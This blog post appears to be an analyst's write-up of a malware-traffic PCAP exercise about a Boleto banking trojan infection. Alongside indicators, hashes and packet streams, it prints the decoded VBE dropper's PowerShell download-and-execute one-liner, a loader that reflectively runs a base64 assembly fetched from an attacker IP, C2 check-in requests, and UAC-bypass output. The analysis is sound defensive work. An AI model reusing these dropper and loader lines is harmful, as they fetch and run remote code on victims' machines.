{"id":662,"date":"2017-01-21T12:54:26","date_gmt":"2017-01-21T12:54:26","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=662"},"modified":"2017-01-27T07:28:33","modified_gmt":"2017-01-27T07:28:33","slug":"malware-exercise-2016-12-17-your-holiday-present","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=662","title":{"rendered":"Malware Exercise 2016-12-17 Your Holiday Present"},"content":{"rendered":"

Below is my write up of the latest exercise from Brad. There are two things that I learned from doing this exercise: 1) there is a difference between TCP Stream and HTTP Stream as there is more information available in TCP Stream, and 2) how to convert an encoded file from base64 to ASCII. For this last one, I came across Matt Bromiley’s blog<\/a> covering Brad’s exercise and this was included in his write-up. As usual, all artifacts for this write-up can be found over in my repo located here<\/a>.<\/p>\n

Executive Summary
\n=================
\nBased on my analysis, it looks as if the user was compromised via a drive-by download or by clicking on a link in an email that we cannot see. From there the client’s system downloaded a file which kicked off the compromise. It then sent data to a compromised server while also connecting to a IRC channel. The type of malware this user received looks to be related to the Beleto family which targets payments made via the Boleto payment system and re-routes the payment from the intended recipient to a third party. For more information please see this link from Symantec<\/a><\/a>.<\/p>\n

At this time the best course of action would be to take this system off the network, backup any files that need to be backed up, and to wipe the system clean. While that is happening, the IP addresses and domains should be blocked at the exterior.<\/p>\n

About The Investigation
\n=======================
\n\u2013 Date and time range of the traffic you\u2019re reviewing.
\n> 2016-12-17 02:30:38 – 2016-12-17 02:51:56
\n> Elapsed: 00:21:17<\/p>\n

\u2013 Date and time of infection.
\n> Sat, 17 Dec 2016 02:33:55 GMT<\/p>\n

\u2013 IP address, MAC address, Other host information
\n> 172[.]16[.]2[.]96 \/ 00:1c:23:9b:70:5e \/ Hostname: FROGGY-PC-Matthew-Frogman \/ OS: Windows 7 Home Premium<\/p>\n

Indicators of Compromise
\n========================
\n> 65[.]181[.]125.20 \/ wme0hsxg[.]e6to8jdmiysycbmeepm29nfprvigdwev[.]top (Port 80)
\n> 74[.]117[.]178[.]58 \/ www[.]4shared[.]com (Port 443)
\n> 74[.]117[.]178[.]179 \/ dc621[.]shared[.]com
\n> 65[.]181[.]112[.]240 \/ *[.]devyatinskiy[.]ru (Port 80)
\n> 65.181.113.204 (Port 443)<\/p>\n

Hash Information of Artifacts
\n=============================
\nFile name: 16122016xoGuI9iOhm1WwDLLwlkxwX.vbe
\nSize: 548KB
\nMD5 hash: 7f57b0543ca57dfa59ece94f393969ce
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/d1faae74de1d15de0fc9ff900071b2c93e8829c16cf83d3c5b8d54f0c7f362ab\/analysis\/<\/a>
\nFirst submission: 2016-12-17 04:14:14 UTC
\nDetection ratio: 2 \/ 55<\/p>\n

File name: dll.dll
\nSize: 234KB
\nMD5 hash: 663ebf81af4eb449961bbc84ff76bd45
\nVirustotal: NA <\/p>\n

File name: dll.dll.exe
\nSize: 235KB
\nMD5 hash: 2a82acb3c0e801cb67b80db2a8c825f2
\nVirustotal: NA<\/p>\n

File name: w7.zip
\nSize: 52KB
\nMD5 hash: 3588e117cf264143ea4eface976f7fd0
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/8a82fb0295b1d469d570645d3758e2fdef31ea623da2297dcd0b7d6a93a2744c\/analysis\/<\/a>
\nFirst submission: 2016-12-17 04:15:05 UTC
\nDetection ratio: 0 \/ 55<\/p>\n

Analysis of The Compromise
\n===========================
\nSo based on what is in the PCAP, it looks as if the user clicked on the link “wme0hsxg[.]e6to8jdmiysycbmeepm29nfprvigdwev[.]top\/1dkfJu[.]php?1dkfJu=wME0HsXGMATTHEW” which then redirected the user over to a Bitly shortened URL. <\/p>\n

\r\nGET \/1dkfJu.php?1dkfJu=wME0HsXGMATTHEW HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: wme0hsxg[.]e6to8jdmiysycbmeepm29nfprvigdwev[.]top\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 302 Found\r\nDate: Sat, 17 Dec 2016 02:33:55 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u4\r\nlocation: http:\/\/bit.ly\/2hFHSJG\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 22\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text\/html<\/pre>\n
A simple use of curl here helped to decipher where this Bitly URL sent the user:<\/p>\n
\r\ncurl -k http:\/\/bit[.]ly\/2hFHSJG\r\n<html>\r\n<head><title>Bitly<\/title><\/head>\r\n<body><a href="http:\/\/www[.]4shared[.]com\/web\/directDownload\/j2PZxBQ-ba\/hc36u2[.]f621e11bd126bcaa3dcae9ce0432e705">moved here<\/a><\/body><\/pre>\n
Since the site was using a SSL certificate, we can only assume that there was code on that site that redirected the user to the site “dc621[.]4shared[.]com\/download\/j2PZxBQ-ba\/16122016xoGuI9iOhm1WwDLLwlkxwX[.]vbe?dsid=hc36u2[.]f621e11bd126bcaa3dcae9ce0432e705&sbsr=100a1e98f14abbeeade785168273205e992&lgfp=3000.” It is here that it looks as if there was an encoded binary file being downloaded.<\/p>\n
\r\nGET \/download\/j2PZxBQ-ba\/16122016xoGuI9iOhm1WwDLLwlkxwX.vbe?dsid=hc36u2.f621e11bd126bcaa3dcae9ce0432e705&sbsr=100a1e98f14abbeeade785168273205e992&lgfp=3000 HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: dc621[.]4shared[.]com\r\nConnection: Keep-Alive\r\nCookie: day1host=h\r\n\r\nHTTP\/1.1 200 OK\r\nServer: 621\r\nSet-Cookie: fdsj2PZxBQ-ba=INITIALIZED; Domain=.4shared.com; Expires=Sat, 17-Dec-2016 02:34:43 GMT; Path=\/\r\nContent-Disposition: attachment; filename="16122016xoGuI9iOhm1WwDLLwlkxwXmyIhmHcZHc.vbe"; filename*=utf-8''16122016xoGuI9iOhm1WwDLLwlkxwXmyIhmHcZHc.vbe\r\nAccept-Ranges: bytes\r\nLast-Modified: Fri, 16 Dec 2016 19:25:35 GMT\r\nETag: 7f57b0543ca57dfa59ece94f393969ce\r\nSet-Cookie: utrf=9f5c91987c; Domain=.4shared.com; Expires=Sun, 18-Dec-2016 02:32:43 GMT; Path=\/\r\nContent-Type: APPLICATION\/OCTET-STREAM;charset=UTF-8\r\nContent-Length: 548\r\nDate: Sat, 17 Dec 2016 02:32:42 GMT\r\n\r\n..#.@.~.^.+.Q.A.A.A.A.=.=.9.b.:.~.}.4.N.?.t...V.^.l.\/...Y.~.r.(.L.j.4...V.V.{.\/.D...b.Y...6.8.L.A.m.D.`.E...j.^.M.k.2.Y.c.j.t...V.s.E.*.).Z.G.U.k.Y.~.;.!.G.D.+.x.r.J.r.J.).k.Y.M.\/.H.G.'.E.m.s.N. .n.X.+.P.J.\/.P.a.W.h.....d.t...V.^.P.R.x.G.2.,.O.n.6...^.P.(.X.2.C.k.\/.P.R.^.,.J.'.p.!.G.D.+.'.r.q.A.(.P.v.1...A.O.}.4.%.+.1.Y.~.H...Y.R.q.n.4.;.V.k...U.O.#.c.f.K.h.U.V.G.C.9.?.O.D.b.U.o.v.B.4.O.D.w.).&.&.+.*. .F.R.q.c.F.q.y.R.y.c.!.J.4.b.8.k.J.h.{.R.D.6.O.v.*.J.[.5.;.W.D.+.[.r.I.a.J.=.W.(.9.j.t.n.s.^.R.].E.\t.~.\/.D.D.\/.\\.G.~.!.F.l.E.A.A.A.=.=.^.#.~.@.<\/pre>\n
The interesting part here is what Wireshark thinks this file is. When you look at the request above, the communication between the client and server does not give any evidence that the file is a binary (ie: Accept: text\/html, application\/xhtml+xml, *\/*). When you look at Export –> HTTP Objects, Wireshark shows that the file is a binary. Captipper shows it the same way as well.<\/p>\n
\"\"<\/a><\/p>\n
\r\nInfo of conversation 2: \r\n\r\n SERVER IP   : 74[.]117[.]178[.]179:80\r\n TIME        : Sat, 12\/17\/16 02:32:43\r\n HOST        : dc621[.]4shared[.]com\r\n URI         : \/download\/j2PZxBQ-ba\/16122016xoGuI9iOhm1WwDLLwlkxwX.vbe?dsid=hc36u2.f621e11bd126bcaa3dcae9ce0432e705&sbsr=100a1e98f14abbeeade785168273205e992&lgfp=3000\r\n REFERER     : \r\n METHOD      : GET\r\n RESULT NUM  : 200 OK\r\n RESULT TYPE : APPLICATION\/OCTET-STREAM\r\n FILE NAME   : "16122016xoGuI9iOhm1WwDLLwlkxwXmyIhmHcZHc.vbe"; filename*\r\n MAGIC       : Inconclusive. Probably binary (BINARY)\r\n LENGTH      : 548 B<\/pre>\n
I was able to decode this file by converting it from an encoded base64 file by using the following command: <\/p>\n
\r\niconv -f UTF-16 -t ASCII 16122016xoGuI9iOhm1WwDLLwlkxwX.vbe | python decode-vbe.py<\/pre>\n
which proceeded to give me the following output:<\/p>\n
\r\nDim ObjShell:set ObjShell=CreAteObjEct("WScript.Shell"):Const quote="""":strCMD="cmd.exe \/C powershell -nop -exec bypass -c "&Quote&"IEX (New-Object Net.WebClient).DownloadString('http:\/\/65[.]181[.]112[.]240\/bibi\/w7.txt')"&Quote&";x":obJShell.Run strCMD,0<\/pre>\n
We then see the GET request to the site “65[.]181.112.240\/bibi\/w7[.]txt” and an attempt to download another file via some code as seen below. <\/p>\n
\r\nGET \/bibi\/w7.txt HTTP\/1.1\r\nHost: 65[.]181[.]112[.]240\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:39 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nLast-Modified: Fri, 16 Dec 2016 19:24:36 GMT\r\nETag: "e200f-656-543cb8537c500"\r\nAccept-Ranges: bytes\r\nContent-Length: 1622\r\nVary: Accept-Encoding\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text\/plain\r\n\r\nif (-NOT (Test-Path $PsHome"\\ok.txt")) {\r\n\r\n[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")\r\n[System.Reflection.Assembly]::LoadWithPartialName("System")\r\n[System.Reflection.Assembly]::LoadWithPartialName("using System.IO")\r\n[System.Reflection.Assembly]::LoadWithPartialName("System.Reflection")\r\n[System.Reflection.Assembly]::LoadWithPartialName("System.Runtime.InteropServices")\r\n[System.Reflection.Assembly]::LoadWithPartialName("using System.Text")\r\n[System.Reflection.Assembly]::LoadWithPartialName("System.Threading")\r\n[System.Reflection.Assembly]::LoadWithPartialName("System.Management")\r\n\r\n   $ThreadArray = @()  \r\n\r\n$wc = New-Object System.Net.WebClient   \r\n[byte[]]$bytes = $wc.DownloadData("hxxp:\/\/65[.]181[.]112[.]240\/bibi\/aw7.tiff")\r\n\r\n$codes = [System.Text.Encoding]::ASCII.GetString($bytes)\r\n$decode = [System.Convert]::FromBase64String($codes)\r\n\r\n[System.Reflection.Assembly]$var3 = [System.Reflection.Assembly]::Load($decode)\r\n\r\n         \r\n $var3.GetTypes()[4].GetMethods()[2].Invoke([System.Activator]::CreateInstance($var3.GetTypes()[4]), @("hxxp:\/\/65[.]181[.]112.240\/bibi\/W7.zip|hxxp:\/\/65[.]181.112[.]240\/bibi\/W7.zip|38|hxxp:\/\/65[.]181.112[.]240\/bibi\/dll.dll|P5PKLOY+IYtRWfZp9QsAOE0xsSPX5EpPll6aX8AhCIlt\/95dlUKyITFRC237iYPgg4hJhWLy3ZiS3dIDoL2+me53tjlNh5vNlwiuWF2FOZc+jL7e3YKtvzMmVXTOzijh40z0N7XS0dvBkuLWisHFvxysHKKJgMzFJW+j70iBy3aHZQTdmqWf1Z9qR8vNSVQlvEuu2JXVR4hEHZlPlhxvW5sy+7RWeEIWGdpfR2lkW2L9c7w0GGjmhcSJX6kAeCxmmzL7tFZ4QhYZ2l9HaWRbYmh5SmLvtMqtgfTdyfW9QLsZ2l9HaWRbYjdFykZwmuvb+dFbuCJATqFHa56HjA9mk59qR8vNSVQlXHjXfLFXP2+mdzHzeLms32AUonbbAHoNn2pHy81JVCV\/wF2odrmqboyV5f3eNoz2mCGgeotVRmrCIqrTiMe6qA==|231|1")   );\r\n\r\n}\r\nGET \/bibi\/aw7.tiff HTTP\/1.1\r\nHost: 65[.]181.112[.]240\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:40 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nLast-Modified: Fri, 16 Dec 2016 19:23:48 GMT\r\nETag: "e2010-1baac-543cb825b5900"\r\nAccept-Ranges: bytes\r\nContent-Length: 113324\r\nContent-Type: image\/tiff\r\n\r\nTVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDACfDI1gAAAAAAAAAAOAAAiELAQsAAEQBAAAGAAAAAAAAPmMBAAAgAAAAgAEAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADAAQAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPBiAQBLAAAAAIABANACAAAAAAAAAAAAAAAAAAAAAAAAAKABAAwAAAC4YQEAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAREMBAAAgAAAARAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAANACAAAAgAEAAAQAAABGAQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKABAAACAAAASgEAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAgYwEAAAAAAEgAAAACAAUApPoAABRnAAABAAAAAAAAALBgAADzmQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswBACQAQAAAQAAEQB+AQAABBT+ARb+ARMKEQotCnMLAAAKgAEAAAQUChQLKAwAAAoMCAJvDQAACg0ACRT+AR<\/pre>\n
From here, we see GET requests made to the site www[.]devyatinskiy[.]ru and more GET requests to the IP address 65[.]181.112[.]240. Note that the domain www[.]devyatinskiy[.]ru resolves to the address of 65[.]181.112[.]240. We can also see that the GET requests have some information about the client system, requests to get more files (same location that is seen above in the code), and where files should be executed from. <\/p>\n
\"\"<\/a><\/p>\n
\r\nGET \/bsb\/infects\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N\/A HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:42 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 68\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    Windows 7 Home Premium    =       N\/AGET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20Iniciou%20o%20executar%20%20http:\/\/65.181.112.240\/bibi\/W7.zip%7Chttp:\/\/65.181.112.240\/bibi\/W7.zip%7C38%7Chttp:\/\/65.181.112.240\/bibi\/dll.dll%7CP5PKLOY+IYtRWfZp9QsAOE0xsSPX5EpPll6aX8AhCIlt\/95dlUKyITFRC237iYPgg4hJhWLy3ZiS3dIDoL2+me53tjlNh5vNlwiuWF2FOZc+jL7e3YKtvzMmVXTOzijh40z0N7XS0dvBkuLWisHFvxysHKKJgMzFJW+j70iBy3aHZQTdmqWf1Z9qR8vNSVQlvEuu2JXVR4hEHZlPlhxvW5sy+7RWeEIWGdpfR2lkW2L9c7w0GGjmhcSJX6kAeCxmmzL7tFZ4QhYZ2l9HaWRbYmh5SmLvtMqtgfTdyfW9QLsZ2l9HaWRbYjdFykZwmuvb+dFbuCJATqFHa56HjA9mk59qR8vNSVQlXHjXfLFXP2+mdzHzeLms32AUonbbAHoNn2pHy81JVCV\/wF2odrmqboyV5f3eNoz2mCGgeotVRmrCIqrTiMe6qA==%7C231%7C1 HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:43 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 603\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    Iniciou o executar  http:\/\/65.181.112.240\/bibi\/W7.zip|http:\/\/65.181.112.240\/bibi\/W7.zip|38|http:\/\/65.181.112.240\/bibi\/dll.dll|P5PKLOY IYtRWfZp9QsAOE0xsSPX5EpPll6aX8AhCIlt\/95dlUKyITFRC237iYPgg4hJhWLy3ZiS3dIDoL2 me53tjlNh5vNlwiuWF2FOZc jL7e3YKtvzMmVXTOzijh40z0N7XS0dvBkuLWisHFvxysHKKJgMzFJW j70iBy3aHZQTdmqWf1Z9qR8vNSVQlvEuu2JXVR4hEHZlPlhxvW5sy 7RWeEIWGdpfR2lkW2L9c7w0GGjmhcSJX6kAeCxmmzL7tFZ4QhYZ2l9HaWRbYmh5SmLvtMqtgfTdyfW9QLsZ2l9HaWRbYjdFykZwmuvb dFbuCJATqFHa56HjA9mk59qR8vNSVQlXHjXfLFXP2 mdzHzeLms32AUonbbAHoNn2pHy81JVCV\/wF2odrmqboyV5f3eNoz2mCGgeotVRmrCIqrTiMe6qA==|231|1GET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20Iniciar%7B69%7D HTTP\/1.1\r\nHost: www.devyatinskiy.ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:44 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 42\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    Iniciar{69}GET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20AV%20:%20N\/A HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:46 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 39\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    AV : N\/AGET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20Iniciar%7B90%7D HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:47 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 42\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    Iniciar{90}GET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20%20Iniciar%7B121%7D%20-%20Download%20file%201080646 HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:52 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 68\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =     Iniciar{121} - Download file 1080646GET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20Iniciar%7B133%7D%20%20Downlaod%20os%202%20253440%20%20%20%20%20--%201080646 HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:55 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 80\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    Iniciar{133}  Downlaod os 2 253440     -- 1080646GET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20Pasta%20===%20C:%5CUsers%5CMatthew.Frogman%5CAppData%5CLocal%5CTemp%5CJava%5CIonic.Zip.Reduced.dll HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:57 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 111\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    Pasta === C:\\Users\\Matthew.Frogman\\AppData\\Local\\Temp\\Java\\Ionic.Zip.Reduced.dllGET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20ok%20appdata%20Pasta%20===%20C:%5CUsers%5CMatthew.Frogman%5CAppData%5CLocal%5CTemp%5CJava%5CIonic.Zip.Reduced.dll HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:58 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 122\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    ok appdata Pasta === C:\\Users\\Matthew.Frogman\\AppData\\Local\\Temp\\Java\\Ionic.Zip.Reduced.dllGET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20Continuou%20...%20extrair HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:34:00 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 52\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    Continuou ... extrairGET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20OK%20%20extrair%20-%20Criar%20Classe HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:34:02 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 57\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    OK  extrair - Criar ClasseGET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20OK%20Criar%20Classe%20-%20vou%20executar%20%20%20NSCS.exe HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:34:03 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 72\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    OK Criar Classe - vou executar   NSCS.exe<\/pre>\n
When looking at HTTP Objects in Wireshark, it did not reveal any other binary files outside of the “16122016xoGuI9iOhm1WwDLLwlkxwX.vbe” file. But when you look at the GET requests from the PCAP, there are requests for files such as, “W7.zip,” “dll.dll,” and “dll.dll.exe” (which is all part of the same stream – stream 17). So there are binary files being downloaded by the client.<\/p>\n
\r\nGET \/bibi\/W7.zip HTTP\/1.1\r\nHost: 65[.]181.112[.]240\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:49 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nLast-Modified: Fri, 16 Dec 2016 19:23:48 GMT\r\nETag: "e2014-107d46-543cb825b5900"\r\nAccept-Ranges: bytes\r\nContent-Length: 1080646\r\nContent-Type: application\/zip\r\n\r\nPK....\t.....jI.).v.|....\/.....RemoteServerOK.dll}\r\n\r\n*****\r\n\r\nGET \/bibi\/dll.dll HTTP\/1.1\r\nHost: 65[.]181.112[.]240\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:53 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nLast-Modified: Fri, 16 Dec 2016 19:23:48 GMT\r\nETag: "e2013-3de00-543cb825b5900"\r\nAccept-Ranges: bytes\r\nContent-Length: 253440\r\nContent-Type: application\/x-msdos-program\r\nX-Pad: avoid browser bug\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n*****\r\n\r\nGET \/bibi\/dll.dll.exe HTTP\/1.1\r\nHost: 65[.]181.112[.]240\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:33:54 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nLast-Modified: Fri, 16 Dec 2016 19:23:48 GMT\r\nETag: "e2015-60cc0-543cb825b5900"\r\nAccept-Ranges: bytes\r\nContent-Length: 396480\r\nContent-Type: application\/x-msdos-program\r\nX-Pad: avoid browser bug\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.<\/pre>\n
When looking at this stream in Wireshark, it looks like the dll.dll file is related to the “Ionic.Zip.Reduced.dll” as I saw references to it in the TCP stream and PSExec in the “Dll.dll.exe” stream.<\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
Then there is an interesting conversation in stream 18\/19 (they look identical).<\/p>\n
\r\nGET \/bsb\/debugnosso\/index.php?N=FROGGY-PC-Matthew-Frogman%20=%20%20%20%20Bypass%20UAC%20,%20=%09%20__%20__%20___%20___%20%20%20___%20%20%20%20%20___%20___%20___%20%0D%0A%09%7C%20%20V%20%20%7C%20%20_%7C_%20%20%7C%20%7C%20%20_%7C___%7C%20%20%20%7C_%20%20%7C_%20%20%7C%0D%0A%09%7C%20%20%20%20%20%7C_%20%20%7C_%7C%20%7C_%7C%20.%20%7C___%7C%20%7C%20%7C_%20%20%7C%20%20_%7C%0D%0A%09%7C_%7C_%7C_%7C___%7C_____%7C___%7C%20%20%20%7C___%7C___%7C___%7C%0D%0A%09%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0D%0A%09%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%5Bby%20b33f%20-%3E%20@FuzzySec%5D%0D%0A%0D%0A%5B?%5D%20Operating%20system%20core%20count:%202%0D%0A%5B%3E%5D%20Duplicating%20CreateProcessWithLogonW%20handles..%0D%0A%5B!%5D%20No%20valid%20thread%20handles%20were%20captured,%20exiting! HTTP\/1.1\r\nHost: www[.]devyatinskiy[.]ru\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:34:16 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 424\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-Matthew-Frogman =    Bypass UAC , =\t __ __ ___ ___   ___     ___ ___ ___ \r\n\t|  V  |  _|_  | |  _|___|   |_  |_  |\r\n\t|     |_  |_| |_| . |___| | |_  |  _|\r\n\t|_|_|_|___|_____|___|   |___|___|___|\r\n\t                                    \r\n\t               [by b33f -> @FuzzySec]\r\n\r\n[?] Operating system core count: 2\r\n[>] Duplicating CreateProcessWithLogonW handles..\r\n[!] No valid thread handles were captured, exiting!<\/pre>\n
A quick Google for “b33f” and “FuzzySec” lead me to the the following links that have more information about what looks to be UAC bypass methods: <\/p>\n
Anatomy of UAC Attacks: http:\/\/www.fuzzysecurity.com\/tutorials\/27.html<\/a>
\nBypass-UAC: http:\/\/github.com\/FuzzySecurity\/PowerShell-Suite\/tree\/master\/Bypass-UAC<\/a><\/p>\n
As for MS16-032, this looks to be an issue with “Secondary Logon to Address Elevation of Privlege” found in Windows 7 and up. For more information about this please see this link<\/a> from Microsoft.<\/p>\n
In stream 20, the malware created it’s persistence on the system via a scheduled task. Note that the FQDN has now changed from www[.]devyatinskiy[.]ru to api[.]devyatinskiy[.]ru.<\/p>\n
